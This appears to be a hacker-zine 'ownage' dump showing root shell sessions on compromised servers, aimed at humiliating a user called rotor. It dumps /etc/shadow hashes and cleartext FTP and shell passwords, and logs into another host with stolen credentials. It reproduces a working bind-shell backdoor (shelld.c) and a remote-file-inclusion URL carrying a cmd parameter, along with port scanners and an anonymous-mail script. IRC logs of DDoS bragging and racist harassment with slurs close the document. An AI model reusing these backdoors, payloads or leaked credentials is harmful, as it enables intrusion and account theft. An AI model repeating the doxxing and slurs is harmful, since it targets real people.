root 26884 0.0 2.0 23356 21636 ? SN 00:42 0:01 spamd child
root 26885 0.0 2.1 23592 21836 ? SN 00:42 0:01 spamd child
mysql 31311 0.0 7.8 93980 81004 ? SN 01:01 0:02 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
bmxer103 15326 0.0 0.1 7108 1940 ? SN 01:34 0:00 pure-ftpd (IDLE)
nobody 26943 0.1 1.7 20584 18176 ? SN 02:11 0:03 /usr/local/apache/bin/httpd -DSSL
nobody 30140 0.2 1.7 20592 18112 ? SN 02:24 0:02 /usr/local/apache/bin/httpd -DSSL
root 30670 0.0 0.1 6616 1932 ? SN 02:26 0:00 /usr/sbin/exim -q
root 31837 0.1 0.0 1532 416 ? SN 02:27 0:01 [bdflush]
root 3275 0.0 0.0 2180 1016 ? SN 02:35 0:00 inetd
root 5468 0.0 0.1 6868 2012 ? SN 02:41 0:00 sshd: rpm [priv]
rpm 5506 0.0 0.2 7016 2304 ? SN 02:41 0:00 sshd: rpm@pts/2
rpm 5507 0.0 0.1 5336 1364 pts/2 SN 02:41 0:00 -bash
nobody 5644 0.2 1.7 20428 17876 ? SN 02:42 0:00 /usr/local/apache/bin/httpd -DSSL
root 5678 0.0 0.1 2184 1216 pts/2 SN 02:42 0:00 k-rad
nobody 5995 0.1 1.7 20428 17884 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 6070 0.0 1.7 20428 17860 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 6107 0.1 1.7 20428 17956 ? SN 02:44 0:00 /usr/local/apache/bin/httpd -DSSL
vinniej 6340 0.0 6.7 77676 69456 ? SN 02:44 0:00 cpanellogd - http logs for vinniej
vinniej 6360 0.0 0.0 2176 992 ? SN 02:45 0:00 sh -c /usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog +C"IMAGEDIR /images/" +C"DOMAINSFILE /usr/local/cpanel/3rdparty/share/analog/lang/ukdom.t
vinniej 6361 0.0 0.0 1524 420 ? SN 02:45 0:00 /usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog +CIMAGEDIR /images/ +CDOMAINSFILE /usr/local/cpanel/3rdparty/share/analog/lang/ukdom.tab +CCHAR
mailnull 7849 0.4 0.3 7576 3720 ? SN 02:45 0:00 /usr/sbin/exim -bd -q60m
root 7976 5.0 0.3 7696 4104 ? SN 02:46 0:00 /usr/sbin/exim -q
mailnull 7977 0.0 0.4 7696 4148 ? RN 02:46 0:00 /usr/sbin/exim -q
root 7978 0.0 0.0 2884 892 pts/2 RN 02:46 0:00 ps aux

root@panther [/tmp]# cat /etc/passwd | grep killerz
killerz:x:32479:32483::/home/killerz:/usr/local/cpanel/bin/noshell

// No shell for rotor

root@panther [/tmp]# cat /etc/shadow | grep killerz
killerz:$1$KcR4KL0s$bHH0lKn5cYW5zMKnhInsh/:12870::::::

// But feel free to crack his password :)

root@panther [/home2/killerz]# ls
./ .addon-installlog .contactemail .mailboxlist .neomail-rotor/ .spamkey .trash/ code/ index.html mail/ public_html/ www@
../ .addonscgi-phpBB .lastlogin .neomail/ .phpchats .sqmaildata/ FreeBSD.png etc/ kscan.c public_ftp/ tmp/
root@panther [/home2/killerz]# ls *
FreeBSD.png index.html kscan.c

code:
./ ../ coolPHP.txt

etc:
./ ../ .imapv4cp5c ftpquota killerz.org/

mail:
./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/ neomail-trash saved-messages sent-mail

public_ftp:
./ ../ incoming/

public_html:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/ c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/ newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/ cam2/ code/ electronics/ hawe index_files/ klog.txt netit newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/

www:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/ c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/ newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/ cam2/ code/
electronics/ hawe index_files/ klog.txt netit newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/

tmp:
./ ../ analog/ awstats/ lastrun lastrun.bw webalizer/ webalizerftp/

root@panther [/home2/killerz]# cd www
root@panther [/home2/killerz/www]# ls *
0x41.tgz LOL.html Thumbs.db b4b0.php chat.txt index.php klog.txt netit newss.GIF postinfo.html tsniff.txt
FreeBSD.png Scan0007.jpg _vti_inf.html c0n3ct.c hawe kdoor.txt kscan.c netstat.txt pastebin.pl* shelld.c www-beta

FreeBSD:
./ ../ FreeBSD-flat.vmdk FreeBSD.png FreeBSD.png.sav FreeBSD.vmdk FreeBSD.vmsn FreeBSD.vmx.sav nvram nvram.sav

_private:
./ ../ .htaccess

_vti_bin:
./ ../ .htaccess _vti_adm/ _vti_aut/

_vti_cnf:
./ ../ .htaccess

_vti_log:
./ ../ .htaccess

_vti_pvt:
./ ../ .htaccess .roles access.cnf botinfs.cnf bots.cnf deptodoc.btr doctodep.btr frontpg.lck service.cnf service.grp service.lck service.pwd services.cnf svcacl.cnf writeto.cnf

_vti_txt:
./ ../ .htaccess

abicons:
./ ava_bart.gif ava_inspector.gif blugr-folder.gif clip.gif error.gif idea.gif nb-blugr-go.gif pixel.gif support.gif wb-left.gif
../ ava_biz_man.gif ava_penguin.gif blugr-folder_new.gif closedfolder.gif find.gif img.gif nb-blugr-login.gif question.gif tongue.gif wb-right.gif
3go.gif ava_blonde.gif ava_poo_bear.gif botleftcorn.gif comp_usr.gif folder.gif index.html nb-blugr-register.gif redarrow.gif top_corner_left.gif wb-top.gif
admin.gif ava_brutus.gif ava_popeye.gif botrightcorn.gif curl_footer.gif folderlocked.gif join.gif newmail.wav reload.gif top_corner_right.gif wb-top_left.gif
agree.gif ava_duck.gif ava_red_nose.gif bottom.gif curl_header.gif formicons/ line.gif newpost.gif sad.gif topper2.gif wb-top_right.gif
angry.gif ava_felix_cat.gif ava_sylvester.gif bottom_corner_left.gif curve_ll.gif go.gif login.gif news-eye.gif search_logo.jpg trans_img.gif who.gif
apache/ ava_garfield.gif ava_tweetybird.gif bottom_corner_right.gif curve_lr.gif go32.gif logo.gif news.gif smile.gif turtlegreen.gif yuk.gif
arc-left.gif ava_gentleman.gif ava_white_rabbit.gif bottommenu.jpg curve_ul.gif go_btn.gif makeiconlist.pl ntopcorn.gif smile_rotate.gif wb-bottom.gif
arc-right.gif ava_girl.gif ava_young_man.gif brownmenu.jpg curve_ur.gif hlbg.gif menubrown.gif ntopcornleft.gif smileb.gif wb-bottom_left.gif
ava.txt ava_girl_big_eye.gif avatars.htm bullet.gif dark_folder.gif hline_mblue.gif msg.gif overview.gif spinach.gif wb-bottom_right.gif
ava_barney_rubble.gif ava_huckleberryhound.gif blue-green.gif chat.gif disagree.gif htmlarea/ navigate.gif pencil.gif stats.gif wb-center.gif

cam2:
./ ../ back.JPG bottom.JPG front.JPG top.JPG

cgi-bin:
./ ../ abmasterd/ anyboard.cgi* getinfo.cgi* search.pl

code:
./ ../ anon.txt coolPHP.txt kscan.pl

cutenews:
./ ../ Copyright.GNU.txt README.htm data/ example1.php example2.php inc/ index.php remember.js search.php show_archives.php show_news.php skins/

ebay:
./ ../ index.html

electronics:
./ ../ ps2port/ volt/

fileupload:
./ ../ README.txt fileupload-class.php upload.php uploads/

fuck:
./ ../ kscan.c

images:
./ ../ 0day_cat_banner.jpg glowshell.gif

index_files:
./ ../ Thumbs.db filelist.xml image001.png image002.jpg

irc:
./ ../ .htaccess cgi-bin/

music:
./ ../ Brotha\ Lynch\ Hung\ -\ One\ Nigga\ Dead.mp3 Brotha\ Lynch\ Hung\ -\ Walking\ To\ My\ Funeral.mp3 c0n3ct.c deria.jpg

newlay:
./ ../ images/ index.html me.JPG search/

owned:
./ arren.php djwink.php e.php hostile.php kels.php lamerDJWINK* lamerE* lamerHOSTILE* lamerLOCUSTZ* lamerREVIX* lamerSILKK* lamerWARCHILD* nesa.php seattle.php spectre.php
../ badonkadonk.png dog.php escape.php index.html lamerARREN* lamerDOG* lamerESCAPE* lamerKELS* lamerNESA* lamerSEATTLE* lamerSPECTRE* locustz.php revix.php silkk.php warchild.php

papers:
./ ../ desolder.txt

pastebin:
./ ../ after before catdir/ cats pastes/

phpBB:
./ admin/ common.php db/ extension.inc groupcp.php includes/ language/ memberlist.php posting.php profile.php templates/ viewonline.php
../ cache/ config.php docs/ faq.php images/ index.php login.php modcp.php privmsg.php search.php viewforum.php viewtopic.php

pics:
./ ../ a3.JPG budz cam/ cross.JPG hk.JPG me.html me.swf meth/ modem.JPG moniter.JPG r0t0r1.JPG r0t0r2.JPG r0t0r3.JPG rotor!.JPG ss/ tower.JPG un4m31.jpg

r00t:
./ ../ shadow

scamz:
./ ../ lez/

~techg0d:
./ ../ AddonsForWebsites/ ircd/ tutorials/

root@panther [/home2/killerz/www]# cd code/
root@panther [/home2/killerz/www/code]# ls
./ ../ anon.txt coolPHP.txt kscan.pl
root@panther [/home2/killerz/www/code]# cat anon.txt
#!/usr/bin/perl
# (C) rotor 2004 - 2005
# http://www.killerz.org
# irc.killerz.org | rotor@killerz.org
# Script to send anonoymous mail
use Getopt::Std;
use IO::Socket;
getopt('hupfm', \%opts);
if (@ARGV == $opts{h}) {
    print("$0 (C) rotor 2004 - 2005\n");
    print("http://www.killerz.org \n");
    print("$0 Help: \n");
    print("-u help \n");
    print("-h server \n");
    print("-p port \n");
    print("-f sender \n");
    print("-m msg \n");
    exit
}
$server = $opts{h}; # SMPT server
$port = $opts{p}; # SMPT server port
$sender = $opts{f}; # MAIL from
$recip = $opts{r}; # recipient
$msg =$opts{m}; #msg
my $sock = IO::Socket::INET->new(PeerAddr => "$server ", PeerPort => "$port ", Proto => "tcp") or die "Cannot connect to host\n";
print("Decalre were email is sending from\n");
print $sock "HELO localhost\n";
sleep(1);
print("Giving email address from\n");
print $sock "MAIL FROM: $sender\n";
sleep(1);
print("Recipients address\n");
print $sock "RCPT TO: $recip\n";
sleep(1);
print("Sending cmd for msg compose\n");
print $sock "DATA\n";
print("Sending Subject\n");
print("Enter Subject:");
$sub=;
print $sock "Subject: $sub\n";
print("Sending msg\n");
print $sock "$msg\n";
root@panther [/home2/killerz/www/code]# cat kscan.pl
#!/usr/bin/perl
##
## killer-scan.pl (C) rotor 2005 - 2006
## rotor@killerz.org || http://www.killerz.org
use IO::Socket;
use strict;
my($port,$pstart,$pstop,$sock); my $host = shift || 127.0.0.1; $pstart = 1; $pstop = 22; for($port=$pstart;$port<=$pstop;$port++){ $sock = IO::Socket::INET->new("$host:$port") || next; print "[ks] $port open on $host [ks]\n"; close($sock); } root@panther [/home2/killerz/www]# cat kscan.c /* * kscan.c (C) rotor 2005 - 2006 * rotor@killerz.org * http://www.killerz.org * http://dynamichell.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define STARTP 1 #define ENDP 1024 #define GREEN "\E[32m" #define RED "\E[31m" int sock, i; int StartP, EndP; struct sockaddr_in addr; struct hostent *h; struct servent *s; int check(int port); int usage(char *); int main(int argc, char *argv[]) { if(argc < 2) { usage(argv[0]); } if(strcmp(argv[2], "-")==0 && strcmp(argv[3], "-")==0) { StartP = (int)STARTP; EndP = (int)ENDP; } else { StartP = atoi(argv[2]); EndP = atoi(argv[3]); } if(StartP > EndP) { printf(RED "Error: Start port is higher then end port\n"); usage(argv[0]); } if ((h=gethostbyname(argv[1])) == NULL){ printf(RED "Cant reolve host\n"); usage(argv[0]); } printf(GREEN "Scanning Host %s from %s to %s \n",argv[1],STARTP,ENDP); for(i=STARTP; i <= ENDP; i++) { if (check(i)==0) { h=getservbyport(htons(i),"tcp"); printf(GREEN "Port %d is open \n",i); } close(sock); } return 0; } int usage(char *Progname) { printf(GREEN "%s (C) rotor 2005 - 2006\n",Progname); printf(RED "Usage: %s [host] [start-port] [end-port]\n",Progname); exit(1); } int check(int port) { if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit; } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr = *((struct in_addr *)h->h_addr); if((connect(sock,(struct sockaddr *) &addr, sizeof(addr)))==0) return 0; else return 1; } root@panther [/home2/killerz/www]# cat shelld.c #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void 
startdaemon (void); int main (int argc, char *argv[]) { int sock, csock, l; struct sockaddr_in caddr; startdaemon (); if ((sock = create_server (9999)) == -1) { // change to stdout so we can see it from PHP!!@!@ fprintf (stderr, "create_server FAIL\n"); exit (-1); } // stop zombies signal (SIGCHLD, SIG_IGN); while (1) { l = sizeof (struct sockaddr_in); if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) { perror ("accept()"); exit (-1); } { int optval = 1; ioctl (sock, FIONBIO, &optval); } fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr)); switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ /* maybe idle timeout ? */ // THIS IS GHETTO BUT FUCK IT I DONT REMEMBER HOWTO CODE PROPERLY. write (csock, "B4B0 ownz you - chrak\r\n", strlen ("B4B0 ownz you - chrak\r\n")); { char *args[] = { "/bin/sh", "-c", "/bin/sh", NULL }, *env[] = { "PATH=/usr/local/sbin:/usr/sbin:/sbin" ":/usr/local/bin:/usr/bin:/bin:.", NULL}; close (0); close (1); close (2); dup2 (csock, 0); dup2 (csock, 1); dup2 (csock, 2); execve ("/bin/bash", args, env); } close (csock); exit (0); default: /* parent */ close (csock); } } } void startdaemon (void) { switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ break; default: /* parent */ exit (0); } if (setsid () == -1) { perror ("setsid()"); exit (1); } //fclose(stdin); //fclose(stdout); } int create_server (unsigned int port) { int sock, l = 1; struct sockaddr_in saddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int)); saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr.s_addr = INADDR_ANY; if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("bind()"); return -1; } /* only 5 connection at a time heh!@ */ if (listen (sock, 5) == -1) { perror ("listen()"); return -1; } return sock; } /* 
http://www.franchiseoutlet.com/us/about.php?page=http://www.learnandteachonline.com/p hp.txt?&cmd=ls%20/ */ root@panther [/home/killerz]# cd mail/ root@panther [/home/killerz/mail]# ls ./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/ neomail-trash saved-messages sent-mail root@panther [/home/killerz/mail]# cd killerz.org/ root@panther [/home/killerz/mail/killerz.org]# ls ./ ../ rotor/ root@panther [/home/killerz/mail/killerz.org]# cd rotor/ root@panther [/home/killerz/mail/killerz.org/rotor]# ls ./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox sent-mail root@panther [/home/killerz/mail/killerz.org/rotor]# cat inbox root@panther [/home/killerz/mail/killerz.org/rotor]# cat sent-mail From MAILER-DAEMON Tue Jan 11 15:15:19 2005 Date: 11 Jan 2005 15:15:19 -0800 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA X-IMAP: 1105485319 0000000000 Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. 
From rotor@panther.unixbsd.info Tue Jan 11 15:15:19 2005 -0800 Status: R X-Status: X-Keywords: Received: from 139.168.150.213 ([139.168.150.213]) by panther.unixbsd.info (IMP) with HTTP for ; Tue, 11 Jan 2005 15:15:19 -0800 Message-ID: <1105485319.41e45e0765a4d@panther.unixbsd.info> Date: Tue, 11 Jan 2005 15:15:19 -0800 From: rotor@killerz.org To: presonic@gmail.com Subject: ircbot MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit User-Agent: Internet Messaging Program (IMP) 3.2.2 X-Originating-IP: 139.168.150.213 root@panther [/home/killerz/mail/killerz.org/rotor]# ls ./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox sent-mail root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.s cat: INBOX.s: No such file or directory root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.Sent From MAILER-DAEMON Mon Jan 10 01:02:29 2005 Date: 10 Jan 2005 01:02:29 -0800 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA X-IMAP: 1105347749 0000000000 Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. 
root@panther [/home/killerz]# cd etc/killerz.org/ passwd passwd,v quota quota,v shadow shadow,v root@panther [/home/killerz]# cd etc/killerz.org/ root@panther [/home/killerz/etc/killerz.org]# ls ./ ../ passwd passwd,v quota quota,v shadow shadow,v root@panther [/home/killerz/etc/killerz.org]# cat * rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell @ 1.2 log @Modified by cpanel-email: args hidden. @ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell @ rotor:10485760 head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:10485760 @ 1.2 log @Modified by cpanel-email: args hidden. 
@ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:10485760 @ rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/::::::: head 1.3; access; symbols; locks killerz:1.3; strict; comment @# @; 1.3 date 2005.01.10.03.01.21; author killerz; state Exp; branches; next 1.2; 1.2 date 2005.01.10.03.01.20; author killerz; state Exp; branches; next 1.1; 1.1 date 2004.12.17.12.19.04; author killerz; state Exp; branches; next ; desc @Init by cpanel-email: args hidden @ 1.3 log @Modified by cpanel-email: args hidden. @ text @rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/::::::: @ 1.2 log @Modified by cpanel-email: args hidden. @ text @d1 1 @ 1.1 log @Initial revision @ text @a0 1 rotor:$1$Ttync3Vr$.Jm3t1eoPrfUOFLo1xwNX1::::::: @ root@panther [/home/killerz/etc/killerz.org]# exit ## I guess that took care of rotor. He pays for that shell and doesnt even have shell.. ## Life is truly sad.. ## Well enough talking its time to explore matts.homeunix.net.. I have a feeling this one might be very interesting [4] I think this is west's box.. He keeps all of his private shit here ssh -l rotor matts.homeunix.net rotor@matts.homeunix.net's password: Last login: Thu Apr 7 04:04:39 2005 from 203-206-252-62. FreeBSD 5.3-RELEASE-p7 (SENTINEL) #2: Mon Apr 4 21:43:16 PDT 2005 AUTHORIZED USE ONLY Welcome to the ____ _____ _ _ _____ ___ _ _ _____ _ / ___|| ____| \ | |_ _|_ _| \ | | ____| | \___ \| _| | \| | | | | || \| | _| | | ___) | |___| |\ | | | | || |\ | |___| |___ |____/|_____|_| \_| |_| |___|_| \_|_____|_____|.pcinetworks.net Enjoy your stay News: 03/10/05 IPv6 working... and Vhosts. Type vhosts to view them... If you're new to this box, change your damn default pw i gave you.. if i crack your pw, you get disabled for a week... i crack the pw list every week.. 
to get vhosts, type 'vhosts' lq(rotor@Sentinel.homeunix.net) mq(~)-> ls ./ .cshrc .mail_aliases .rhosts aolup.bx cyp/ dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA lamerSILKK locustz.php revix.php spectre.php ../ .login .mailrc .shrc arren.php cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php .BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ lamerSEATTLE lamerWARCHILD own/ silkk.php (rotor@Sentinel.homeunix.net) mq(~)-> uname -a; id FreeBSD Sentinel.homeunix.net 5.3-RELEASE-p7 FreeBSD 5.3-RELEASE-p7 #2: Mon Apr 4 21:43:16 PDT 2005 west@Sentinel.homeunix.net:/usr/src/sys/i386/compile/SENTINEL i386 uid=1014(rotor) gid=1014 groups=1014 lq(rotor@Sentinel.homeunix.net) mq(~)-> cat .ssh/known_hosts
lq(rotor@Sentinel.homeunix.net) mq(~)-> cd own/ lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls ./ arren.php djwink.php e.php hostile.php kels.php lamerDJWINK lamerE lamerHOSTILE lamerLOCUSTZ lamerREVIX lamerSILKK lamerWARCHILD nesa.php seattle.php spectre.php ../ badonkadonk.png dog.php escape.php index.html lamerARREN lamerDOG lamerESCAPE lamerKELS lamerNESA lamerSEATTLE lamerSPECTRE locustz.php revix.php silkk.php warchild.php lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat lamer* lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat arren.php Ass for Days! lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cd .. lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls ./ .cshrc .mail_aliases .rhosts aolup.bx cyp/ dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA lamerSILKK locustz.php revix.php spectre.php ../ .login .mailrc .shrc arren.php cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php .BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ lamerSEATTLE lamerWARCHILD own/ silkk.php ## hmm.. Im disapointed.. but wait lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cd " " ## Wow thats skills... lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable ## ok this just got interesting.
lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat cisco* lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat ddoslog 04:40 <@Kelly> [02:40] -> *rotor`* its comments and threats like that that define you as a fucking pup 04:40 <@Kelly> - 04:41 <@aid> haha 04:41 <@aid> yok 04:41 <@aid> a 04:41 <@aid> kelly 04:41 <@aid> omg 04:41 <@aid> ./wi torn 04:41 <@aid> and go to the url 04:41 <@aid> haha 04:41
<@aid> you're gonna piss yourself 04:41 <@aid> i chose the perf box to jupe him with 04:41 <@aid> haha 04:44 <@Kelly> hahahhaha 04:44 <@aid> now 04:44 <@aid> that 04:44 <@aid> is 04:44 <@aid> hilarious 04:44 <@aid> haha 04:44 <@aid> i just hit rotor` 04:44 <@aid> his new bnc 04:44 <@aid> lol 04:44 <@aid> toast 04:44 <@aid> --- 209.133.9.34 ping statistics --- 04:44 <@aid> 8 packets transmitted, 0 received, 100% packet loss, time 7013ms 04:45 <@Kelly> [02:40] well, you suck cock for cancelled shells... heh 04:45 <@Kelly> [02:41] and tehy are hitting lomag again, only this time i have logs of aid saying he was going to it from #obs, obs has snitches u know 04:45 <@Kelly> [02:42] get over youself 04:45 <@Kelly> [02:44] Yannow 04:45 <@Kelly> [02:44] you obviously have never whoised me dumbass 04:45 <@Kelly> [02:44] I work for most of the same providers 04:45 <@Kelly> [02:44] you have shells with 04:45 <@Kelly> [02:45] you fucked up when you had one hit that i work for 04:45 <@Kelly> [02:45] No such nick/channel 04:45 <@aid> lol 04:46 <@aid> haha 04:46 <@aid> rotor` is ~nicuxoji@69.22.129.220 * qeje 04:46 <@aid> rotor` on #syshackers 04:46 <@aid> he'[s 04:46 <@aid> in 04:46 <@aid> my bot is still in 04:46 <@aid> syshackers 04:46 <@aid> haha 04:46 <@Kelly> lol lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat legit Tony Montana - Vote for Pedro says: 69.17.188.187 adduser: INFO: Password for (h0rs3) is: QiivMOtLoiFZJC7 [jsz(jsz@pheer.my.0c192.com)] k [jsz(jsz@pheer.my.0c192.com)] www.cserverz.com/r0t0r god [jsz(jsz@pheer.my.0c192.com)] user: rotor [jsz(jsz@pheer.my.0c192.com)] pass: fuckf3ds [jsz(jsz@pheer.my.0c192.com)] ftp details: u: r0t0r p: fuck3dup [jsz(jsz@pheer.my.0c192.com)] username for ftp is r0t0r@cserverz.com lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat list
lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat more-cisco lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat owned
lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat usable lq(rotor@Sentinel.homeunix.net) mq(~/own)-> exit ## Well that takes care of that shell.... ## Until next time [5] logs to show how leet r0t0r really is. 13:06 <@devii> You're not an abo, rotor. 13:06 <@rotor`> illusion said u said that 13:06 <@rotor`> Uh, 13:06 <@devii> You cant be. 13:06 <@rotor`> yes i am devii 13:06 <@devii> If ur dad is black 13:06 <@rotor`> 50 / 50 13:06 <@devii> and ur mum is white 13:06 <@rotor`> Yes i can be 13:06 <@devii> black ALWAYS dominates.
13:07 <@devii> its a proven fact 13:07 <@rotor`> devii : no it dosnt 13:07 <@devii> it does. 13:07 <@devii> there are rare exceptions. 13:07 <@rotor`> devii: your saying you have never seen a white aboriginal ? 13:07 <@rotor`> I SWEAR TO FUCKING GOD I AM 13:07 <@devii> Ahahaahahaah. 13:07 <@rotor`> HOW ELSE COULD I LIVE IN ABORIGINAL HOUSING 13:07 <@rotor`> IN A MISSION # How sad.. 13:07 <@devii> YAH FUCKEN WABO. 13:07 <@rotor`> U FUCK TARD 13:07 <@devii> rofl. 13:07 <@devii> Ohmy. 13:07 <@Torhne> lol 13:07 <@devii> see wigger, nigger 13:07 <@rotor`> dont tell me im not what i am 13:08 <@rotor`> i love my culture / family 13:08 <@devii> WELL THATS NICE ISNT IT. 13:08 <@rotor`> and am protective about it 13:08 <@devii> But you're not abo. 13:08 <@rotor`> w/e you reackon 13:08 <@devii> =P 13:08 <@rotor`> that pisses me off 13:08 <@rotor`> U JUST PISSED ME OFF 13:09 <@Torhne> lol 13:09 <@rotor`> trying to tell me im not what i am 13:09 <@rotor`> if u dont beleive me devii come down here 13:09 <@rotor`> to my home 13:09 <@rotor`> and aboriginals will answer the door 13:09 <@rotor`> and will live all around me 13:09 <@rotor`> U DONT KNOW JACK SHIT 13:09 <@rotor`> U LIVE IN A RICH TOWN 13:10 <@rotor`> WITH NO ABORIGINALS 13:10 <@rotor`> U ONLY KNOW WHAT U SEE ON FUCKING TV 13:10 <@rotor`> AFK # I bet he was crying here... 13:10 <@Torhne> HAS A DINGO EVER ATE YOUR BABY??? 13:10 <@Torhne> HA BITCH? 13:10 <@Torhne> WHAT NOW? 13:10 <@Torhne> ROTOR IS STrAIGHT OUT OF THE MUTHA FUCKIN HOOD OF AUSSIE LAND # Who is this kid? 13:11 <@Torhne> HE HAS GOT THAT SHIT ON LOCKDOWN 13:11 <@Torhne> SO TIGHT 13:11 <@Torhne> FUCKIN WITH THE BOOMERANG HANGIN OUT THE BACKSIDE OF HIS LOIN CLOTH 13:11 <@Torhne> whrew 13:11 <@rotor`> devii : im serious u dont beleive me # He is done crying and goes back to bitching at girls. 
